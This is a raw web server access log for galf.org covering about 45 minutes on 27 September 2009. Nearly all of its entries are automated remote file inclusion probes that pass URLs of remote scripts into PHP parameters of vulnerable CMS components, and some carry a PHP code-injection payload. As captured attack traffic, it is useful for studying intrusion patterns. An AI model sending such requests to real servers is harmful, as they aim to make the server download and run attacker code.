75.126.94.66 - - [27/Sep/2009:20:47:28 -0700] "GET /logs/access_090601.log%20%20/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.88 - - [27/Sep/2009:20:47:30 -0700] "GET /cendoc.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:20:47:39 -0700] "GET /logs/access_090223.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:47:47 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:47:53 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:47:53 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:47:53 -0700] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:20:49:45 -0700] "GET /logs/access_090629.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:51:33 -0700] "GET /logs/access_090831.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:51:33 -0700] "GET /logs/access_090511.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:52:41 -0700] "GET /error.php?dir=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:52:42 -0700] "GET /logs/access_090504.log/error.php?dir=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:20:52:42 -0700] "GET /logs/error.php?dir=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.135.59.136 - - [27/Sep/2009:20:54:37 -0700] "GET /logs/access_090810.log/?sourcedir=http://nashi-deti.org.ua/plugins/editors/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.94.66 - - [27/Sep/2009:20:54:54 -0700] "GET /logs/access_090615.log/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.252.90.80 - - [27/Sep/2009:20:58:24 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
75.126.94.66 - - [27/Sep/2009:20:58:25 -0700] "GET /logs/access_090601.log/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:20:58:44 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:20:58:44 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:20:58:58 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.12.226 - - [27/Sep/2009:20:58:58 -0700] "GET /logs/access_090420.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:21:00:48 -0700] "GET /logs/access_090518.log/error.php?dir=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:06:43 -0700] "GET /logs/access_090706.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.30.194.163 - - [27/Sep/2009:21:07:05 -0700] "GET /logs/access.log/error.php?dir=http://radiology.mireene.com/bbs/data/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:07:33 -0700] "GET /logs/access_090629.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:12:14 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:12:15 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:13:00 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:04 -0700] "GET /logs/access_090629.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:04 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:04 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:05 -0700] "GET /logs/access_090629.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:05 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:13:05 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:15:45 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:15:55 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.207.21 - - [27/Sep/2009:21:16:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:16:53 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:16:53 -0700] "GET /logs/access_090622.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:16:53 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:17:00 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:17:00 -0700] "GET /logs/access_090622.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:17:00 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:17:12 -0700] "GET /logs/access_090629.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:17:25 -0700] "GET /logs/access_090629.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.21 - - [27/Sep/2009:21:17:37 -0700] "GET /logs/access_090323.log HTTP/1.1" 200 131072 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:02 -0700] "GET /logs/access_090413.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:02 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:02 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:03 -0700] "GET /logs/access_090413.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:03 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:21:21:03 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
66.207.172.166 - - [27/Sep/2009:21:24:01 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
75.126.94.66 - - [27/Sep/2009:21:24:02 -0700] "GET /logs/access.log/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [27/Sep/2009:21:24:06 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.207.172.166 - - [27/Sep/2009:21:24:06 -0700] "GET /logs/access.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:09 -0700] "GET /appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:10 -0700] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:11 -0700] "GET /appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:11 -0700] "GET /logs//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:25:11 -0700] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
165.194.232.107 - - [27/Sep/2009:21:25:38 -0700] "GET /logs/access.log/skin/zero_vote/ask_password.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
165.194.232.107 - - [27/Sep/2009:21:25:38 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
165.194.232.107 - - [27/Sep/2009:21:25:38 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:25:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:25:46 -0700] "GET /appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:25:46 -0700] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:25:53 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:26:04 -0700] "GET /logs/access_090427.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:26:04 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:26:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:26:17 -0700] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:26:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:26:17 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:26:18 -0700] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:26:19 -0700] "GET /logs/access_090420.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:26:19 -0700] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:02 -0700] "GET /logs/access.log/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:02 -0700] "GET /logs/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:02 -0700] "GET /home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:02 -0700] "GET /home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:02 -0700] "GET /logs/access_090316.log/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:21:27:03 -0700] "GET /logs/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:27:04 -0700] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:27:31 -0700] "GET /logs/access_090831.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.145.96.20 - - [27/Sep/2009:21:27:32 -0700] "GET /logs/access_090831.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:27:53 -0700] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:27:59 -0700] "GET /logs/access_090831.log%20%20//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:21:28:21 -0700] "GET /logs/access.log%20%20/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:21:28:33 -0700] "GET /logs/access_090511.log%20%20/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
198.170.82.18 - - [27/Sep/2009:21:29:04 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
198.170.82.18 - - [27/Sep/2009:21:29:04 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
198.170.82.18 - - [27/Sep/2009:21:29:04 -0700] "GET /logs/access_090824.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:21:30:34 -0700] "GET /error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:21:30:34 -0700] "GET /logs/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:21:30:34 -0700] "GET /logs/access.log%20%20/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:31:30 -0700] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:21:31:44 -0700] "GET /logs/access_090511.log/home.php?pagina=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:31:52 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:31:55 -0700] "GET /logs/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:31:55 -0700] "GET /error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:31:55 -0700] "GET /logs/access.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:32:01 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:32:02 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:32:06 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:32:28 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:32:29 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
114.4.8.14 - - [27/Sep/2009:21:32:29 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4948 "-" "libwww-perl/5.79" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:32:44 -0700] "GET /skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:32:44 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:32:44 -0700] "GET /logs/access_090406.log//skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:32:45 -0700] "GET /logs/access_090504.log//skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:32:50 -0700] "GET /logs/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:32:50 -0700] "GET /error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:32:50 -0700] "GET /logs/access.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:33:36 -0700] "GET /logs/access.log%20%20/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:33:36 -0700] "GET /error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
